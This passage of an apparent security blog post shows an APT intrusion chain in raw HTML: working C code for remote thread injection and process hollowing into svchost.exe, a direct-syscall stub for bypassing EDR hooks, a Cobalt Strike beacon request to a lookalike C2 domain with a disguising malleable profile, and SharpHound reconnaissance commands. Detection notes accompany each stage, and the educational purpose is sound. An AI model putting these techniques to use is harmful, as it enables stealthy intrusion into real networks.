punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">;</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">LPVOID mem </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> </span><span class=\"token function\" style=\"color:hsl(256, 54%, 50%)\">VirtualAllocEx</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">hProc</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token constant\" style=\"color:hsl(212, 92%, 35%)\">NULL</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> shellcodeLen</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                             MEM_COMMIT </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">|</span><span class=\"token plain\"> MEM_RESERVE</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> PAGE_EXECUTE_READWRITE</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">;</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token function\" style=\"color:hsl(256, 54%, 50%)\">WriteProcessMemory</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">hProc</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 
16%)\">,</span><span class=\"token plain\"> mem</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> shellcode</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> shellcodeLen</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token constant\" style=\"color:hsl(212, 92%, 35%)\">NULL</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">;</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">HANDLE hThread </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> </span><span class=\"token function\" style=\"color:hsl(256, 54%, 50%)\">CreateRemoteThread</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">hProc</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token constant\" style=\"color:hsl(212, 92%, 35%)\">NULL</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token number\" style=\"color:hsl(212, 92%, 35%)\">0</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                                    </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">LPTHREAD_START_ROUTINE</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token 
mem</span>">
plain\">mem</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token constant\" style=\"color:hsl(212, 92%, 35%)\">NULL</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token number\" style=\"color:hsl(212, 92%, 35%)\">0</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token constant\" style=\"color:hsl(212, 92%, 35%)\">NULL</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">;</span><br></span></code></pre></div></div>\n<p>This generates Sysmon Event ID 8 (CreateRemoteThread), which is detectable if you are collecting it.</p>\n<p><strong>Process hollowing (more evasive):</strong></p>\n<div class=\"language-c codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-c codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\">// Create suspended process, replace image with shellcode</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">STARTUPINFO si </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token number\" style=\"color:hsl(212, 92%, 35%)\">0</span><span class=\"token punctuation\" style=\"color:hsl(212, 
13%, 16%)\">}</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">;</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">PROCESS_INFORMATION pi </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token number\" style=\"color:hsl(212, 92%, 35%)\">0</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">;</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token function\" style=\"color:hsl(256, 54%, 50%)\">CreateProcess</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"C:\\\\Windows\\\\System32\\\\svchost.exe\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token constant\" style=\"color:hsl(212, 92%, 35%)\">NULL</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token constant\" style=\"color:hsl(212, 92%, 35%)\">NULL</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token constant\" style=\"color:hsl(212, 92%, 35%)\">NULL</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">              FALSE</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span 
class=\"token plain\"> CREATE_SUSPENDED</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token constant\" style=\"color:hsl(212, 92%, 35%)\">NULL</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token constant\" style=\"color:hsl(212, 92%, 35%)\">NULL</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">&amp;</span><span class=\"token plain\">si</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">&amp;</span><span class=\"token plain\">pi</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">;</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\">// Get thread context to find image base</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">CONTEXT ctx </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token number\" style=\"color:hsl(212, 92%, 35%)\">0</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 
16%)\">;</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">ctx</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">ContextFlags </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> CONTEXT_FULL</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">;</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token function\" style=\"color:hsl(256, 54%, 50%)\">GetThreadContext</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">pi</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">hThread</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">&amp;</span><span class=\"token plain\">ctx</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">;</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\">// Unmap original image, write shellcode at same base address</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token function\" style=\"color:hsl(256, 54%, 
50%)\">NtUnmapViewOfSection</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">pi</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">hProcess</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">PVOID</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\">imageBase</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">;</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token function\" style=\"color:hsl(256, 54%, 50%)\">VirtualAllocEx</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">pi</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">hProcess</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">PVOID</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\">imageBase</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> shellcodeLen</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">               MEM_COMMIT </span><span class=\"token operator\" 
style=\"color:hsl(212, 92%, 35%)\">|</span><span class=\"token plain\"> MEM_RESERVE</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> PAGE_EXECUTE_READWRITE</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">;</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token function\" style=\"color:hsl(256, 54%, 50%)\">WriteProcessMemory</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">pi</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">hProcess</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">PVOID</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\">imageBase</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> shellcode</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> shellcodeLen</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token constant\" style=\"color:hsl(212, 92%, 35%)\">NULL</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">;</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span 
class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\">// Resume thread  now running attacker code inside svchost.exe</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token function\" style=\"color:hsl(256, 54%, 50%)\">SetThreadContext</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">pi</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">hThread</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">&amp;</span><span class=\"token plain\">ctx</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">;</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token function\" style=\"color:hsl(256, 54%, 50%)\">ResumeThread</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">pi</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">hThread</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">;</span><br></span></code></pre></div></div>\n<p>The resulting process shows as <code>svchost.exe</code> in Task Manager and most EDR process trees. 
Detection requires checking whether the on-disk image hash matches what is loaded in memory  a capability present in some EDRs but not all.</p>\n<p><strong>Direct syscalls (bypasses user-mode hooks):</strong></p>\n<p>Modern EDRs hook user-mode APIs like <code>NtAllocateVirtualMemory</code>, <code>NtWriteVirtualMemory</code>, and <code>NtCreateThreadEx</code> in <code>ntdll.dll</code> to intercept injection attempts. Attackers bypass this by calling the syscall directly:</p>\n<div class=\"language-asm codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-asm codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">; Direct syscall stub for NtAllocateVirtualMemory (Windows 10 21H2 syscall number)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">NtAllocateVirtualMemory:</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    mov r10, rcx</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    mov eax, 18h        ; syscall number  varies by Windows build</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    syscall</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    ret</span><br></span></code></pre></div></div>\n<p>Tools like <strong>SysWhispers2</strong> and <strong>SysWhispers3</strong> automate generating these stubs for any NT function. 
The result: injection with no user-mode hooks touched, no EDR API intercept possible.</p>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"stage-3-c2-communication--what-the-beacon-actually-looks-like\">Stage 3: C2 Communication  What the Beacon Actually Looks Like<a href=\"https://inferencedefense.com/academy/blog-internal/apt-initial-access-to-domain-dominance-4-hours#stage-3-c2-communication--what-the-beacon-actually-looks-like\" class=\"hash-link\" aria-label=\"Direct link to Stage 3: C2 Communication  What the Beacon Actually Looks Like\" title=\"Direct link to Stage 3: C2 Communication  What the Beacon Actually Looks Like\" translate=\"no\">​</a></h3>\n<p>A tuned Cobalt Strike beacon over HTTPS will look like this on the wire:</p>\n<div class=\"language-text codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-text codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># HTTP GET beacon request (simplified)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">GET /jquery-3.3.1.min.js HTTP/1.1</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Host: updates.microsoftcdn-assets[.]com</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Accept-Language: en-US,en;q=0.5</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token 
plain\">Accept-Encoding: gzip, deflate</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Cookie: __utma=1.1234567890.1234567890.1234567890.1234567890.1;</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        __utmz=1.1234567890.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Connection: keep-alive</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># The cookie value is the encoded beacon metadata + encrypted command request</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># The server response contains encoded tasking in the response body,</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># disguised as a legitimate jQuery file</span><br></span></code></pre></div></div>\n<p>The malleable C2 profile controls all of this  URI, headers, encoding, response format. 
A sample profile snippet that mimics Amazon browsing:</p>\n<div class=\"language-text codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-text codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">http-get {</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    set uri \"/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books\";</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    client {</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        header \"Accept\" \"*/*\";</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        header \"Host\" \"www.amazon.com\";</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        metadata {</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            base64url;</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            prepend \"session-token=\";</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            prepend \"skin=noskin;\";</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            append \"csm-hit=s-24KU11BB82RZSYGJ3BDK|1419899012996\";</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            header 
\"Cookie\";</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        }</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    }</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    server {</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        header \"Content-Type\" \"text/html; charset=UTF-8\";</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        header \"Server\" \"Server\";</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        output {</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            print;</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        }</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    }</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">}</span><br></span></code></pre></div></div>\n<p>The metadata block encodes the beacon's check-in data inside a realistic Cookie header. 
Network-level detection based on URI or header inspection will not catch this without behavioral analysis.</p>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"stage-4-reconnaissance--bloodhound-at-full-speed\">Stage 4: Reconnaissance  BloodHound at Full Speed<a href=\"https://inferencedefense.com/academy/blog-internal/apt-initial-access-to-domain-dominance-4-hours#stage-4-reconnaissance--bloodhound-at-full-speed\" class=\"hash-link\" aria-label=\"Direct link to Stage 4: Reconnaissance  BloodHound at Full Speed\" title=\"Direct link to Stage 4: Reconnaissance  BloodHound at Full Speed\" translate=\"no\">​</a></h3>\n<p>SharpHound (the BloodHound collector) runs as a .NET assembly, typically executed in-memory via <code>execute-assembly</code>:</p>\n<div class=\"language-text codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-text codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Cobalt Strike console:</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">execute-assembly /opt/tools/SharpHound.exe -c All --zipfilename loot.zip --outputdirectory C:\\Users\\Public\\</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Common collection flags:</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># -c All          : collect all data types (sessions, ACLs, trusts, containers)</span><br></span><span class=\"token-line\" 
style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># --stealth       : reduced noise mode, skips session enumeration</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># --domaincontroller &lt;DC&gt; : target specific DC to reduce distributed noise</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># --excludedcs    : skip DCs in session enumeration (less noisy)</span><br></span></code></pre></div></div>\n<p>What this generates on the network in the first 4 minutes:</p>\n<div class=\"language-text codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-text codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># LDAP queries to DC (port 389/636):</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">- objectClass=computer           (all machines in domain)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">- objectClass=user               (all user accounts)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">- objectClass=group              (all groups)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">- objectClass=organizationalUnit</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">- objectClass=trustedDomain      (trust relationships)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token 
plain\">- nTSecurityDescriptor           (ACL collection  the noisy one)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">- userAccountControl</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">- servicePrincipalName           (Kerberoastable accounts)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># SMB connections (port 445) to sampled workstations:</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">- NetSessionEnum (session enumeration)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">- This generates Event ID 4624 (logon) + 4634 (logoff) on each target</span><br></span></code></pre></div></div>\n<p>Total LDAP query volume against the DC: <strong>200–2000 queries in 4 minutes</strong> depending on domain size. For a 1,000-user domain, this is 3–8x the normal LDAP query rate from workstations  detectable but only if you are baselining LDAP rates per source.</p>\n<p><strong>Reading the BloodHound output  what the attacker sees:</strong></p>\n<!-- -->\n<p>The attacker now has a GPS-guided path to DA. 
